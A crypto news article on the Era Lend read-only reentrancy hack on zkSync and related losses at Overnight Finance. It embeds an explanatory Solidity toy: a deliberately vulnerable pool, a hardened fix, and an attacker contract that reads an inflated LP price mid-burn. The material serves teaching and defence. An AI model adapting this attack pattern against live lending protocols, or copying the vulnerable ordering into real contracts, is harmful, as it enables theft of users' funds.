Era Lend’s lending app on zkSync was hacked for $3.4 million worth of cryptocurrency, according to a July 25 report from blockchain security firm CertiK. The attacker used a “read-only reentrancy attack” to drain the funds. Reentrancy is a class of attack in which a multi-step process is interrupted by an external call and made to continue only after a malicious action has been performed. In a “read-only” reentrancy, the reentrant call does not itself update the contract’s state; it reads state while the original operation is only half complete, so the reader is handed values that are inconsistent with the final result.
We are seeing reports that @Era_Lend was exploited on zkSync
Total losses appear to be $3.4 million in a read-only reentrancy attack
See more below https://t.co/h8xrjccE5i
— CertiK Alert (@CertiKAlert) July 25, 2023
According to the report, the attacker withdrew the funds in two separate transactions using the externally owned account 0xf1D076c9Be4533086f967e14EE6aFf204D5ECE7a. They relied on a vulnerability around the pool’s “_updateReserves” function, which is only called after a callback to the caller, to make the contract report reserve values that had not yet been updated.
Era Lend is a fork of the Syncswap project, and CertiK claimed that other Syncswap-based projects may also be vulnerable to the exploit.
On-chain sleuth and Twitter user Spreek said the Syncswap code allows a user to “burn and then callback before update_reserves is called”, causing the oracle to report incorrect values.
In syncswap LP tokens can be burned, then the callback before update_reserves is called. So the oracle uses the wrong reserve value to calculate the price, resulting in an inflated oracle price. pic.twitter.com/0U7Vu7BzJM
— Speakaway (@speakaway) July 25, 2023
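The burn-then-callback ordering Spreek describes, reduced to a toy so the mechanism can be seen end to end. The Solidity below is an added illustration written for this article; it is not code from SyncSwap, Era Lend, Overnight or CertiK, and the contract names, the simplified deposit/burn accounting, the $1 stablecoin assumption and the numbers are all assumptions. It puts the vulnerable pool beside a hardened one and an attacker contract that reads the LP price during the callback, exactly as a lending protocol’s oracle would.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed toy of the read-only reentrancy pattern described in the article.
// NOT SyncSwap, Era Lend or Overnight code: pool, attacker and numbers are
// stand-ins, and ERC-20 transfers are replaced by plain uint accounting so the
// file compiles on its own (e.g. in Remix). Both pool assets are assumed to be
// $1 stablecoins, so one LP token is worth (reserve0 + reserve1) / totalSupply.

interface IBurnCallback {
    function onBurn(uint256 amount0, uint256 amount1) external;
}

abstract contract PoolBase {
    uint256 public reserve0;
    uint256 public reserve1;
    uint256 public totalSupply;                   // LP tokens outstanding
    mapping(address => uint256) public lpBalance;
    bool internal locked;                         // reentrancy lock

    modifier nonReentrant() {
        require(!locked, "reentrant");
        locked = true;
        _;
        locked = false;
    }

    // Simplified deposit: LP minted 1:1 against the dollar value supplied.
    function deposit(uint256 amount0, uint256 amount1) external {
        reserve0 += amount0;
        reserve1 += amount1;
        totalSupply += amount0 + amount1;
        lpBalance[msg.sender] += amount0 + amount1;
    }

    // Dollar value of one LP token, 1e18 scale. This is what a lending
    // protocol's oracle reads. It is a view, so nonReentrant never guards it.
    function lpPrice() public view virtual returns (uint256) {
        return ((reserve0 + reserve1) * 1e18) / totalSupply;
    }

    function burn(uint256 lp) external virtual;

    function _share(uint256 lp) internal view returns (uint256 a0, uint256 a1) {
        a0 = (lp * reserve0) / totalSupply;
        a1 = (lp * reserve1) / totalSupply;
    }
}

// Vulnerable ordering: the holder's callback runs after totalSupply has been
// reduced but before the reserves are updated, so lpPrice() is inflated for
// the duration of the callback.
contract VulnerablePool is PoolBase {
    function burn(uint256 lp) external override nonReentrant {
        require(lpBalance[msg.sender] >= lp, "insufficient LP");
        (uint256 a0, uint256 a1) = _share(lp);
        lpBalance[msg.sender] -= lp;
        totalSupply -= lp;
        IBurnCallback(msg.sender).onBurn(a0, a1);   // external call ...
        reserve0 -= a0;                             // ... before reserves update
        reserve1 -= a1;
    }
}

// Hardened: effects before interactions, and the price view refuses to answer
// while the pool is mid-operation, so an integrator can never read a torn
// state even if a later code path reintroduces an early callback.
contract HardenedPool is PoolBase {
    function lpPrice() public view override returns (uint256) {
        require(!locked, "pool busy");
        return super.lpPrice();
    }

    function burn(uint256 lp) external override nonReentrant {
        require(lpBalance[msg.sender] >= lp, "insufficient LP");
        (uint256 a0, uint256 a1) = _share(lp);
        lpBalance[msg.sender] -= lp;
        totalSupply -= lp;
        reserve0 -= a0;                             // state fully updated ...
        reserve1 -= a1;
        IBurnCallback(msg.sender).onBurn(a0, a1);   // ... before any external call
    }
}

// Attacker: deposits, burns, and inside the burn callback reads the LP price
// exactly as a lender's oracle would. A result of 0 means the read was refused.
contract Attacker is IBurnCallback {
    PoolBase public pool;
    uint256 public priceDuringBurn;

    constructor(PoolBase _pool) { pool = _pool; }

    function run() external returns (uint256) {
        pool.deposit(500_000e18, 500_000e18);   // receives 1,000,000 LP
        pool.burn(500_000e18);
        return priceDuringBurn;
    }

    function onBurn(uint256, uint256) external override {
        require(msg.sender == address(pool), "not pool");
        try pool.lpPrice() returns (uint256 p) { priceDuringBurn = p; }
        catch { priceDuringBurn = 0; }
    }
}
```

Deploy a pool, then an Attacker pointed at it, and call run(). With only the attacker’s liquidity in the pool, run() against VulnerablePool returns 2e18: totalSupply has already been halved while both reserves still hold their pre-burn values, so each remaining LP token appears to be worth $2 instead of $1, and a lender valuing that LP as collateral at this moment would lend against double its real value. The reentrancy lock never fires because lpPrice() is a view and nothing in the callback touches the pool’s state, which is why a conventional nonReentrant modifier does not stop this. Against HardenedPool, run() returns 0 because lpPrice() reverts with “pool busy”; without that guard the effects-first ordering alone would make the callback see 1e18. The lock check in lpPrice() is the defence an integrator such as a lending oracle actually benefits from, since it turns a silently wrong answer into a revert.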
Spreek also stated that the Era Lend team had acknowledged the attack and paused its zkSync contracts to prevent further abuse.
Another blockchain investigator, known on Twitter as Saul, said the attack had also affected the USDC+ stablecoin, which is issued by the Overnight Finance protocol. According to Saul, the Overnight team acknowledged the findings and paused its own contracts as well. More than $261,000, or 7.86% of the total value of the collateral backing the stablecoin, may have been lost.
In a June 7 blog post explaining how read-only reentrancy attacks are carried out, pseudonymous blockchain investigator Officer’s Notes said that these vulnerabilities are difficult for auditors to detect because “Auditors and debuggers typically only look at entry points that modify state while looking for reentrancy.”
To mitigate this problem, Officer’s Notes recommends that auditors use specialized software to help them find these vulnerabilities.
Era Lend runs on the zkSync network, a zero-knowledge Ethereum layer-2 rollup. In April, the network’s total value locked reached more than $110 million. The network’s developers intend to create an ecosystem of interoperable chains called “Hyperchains” by the end of the year.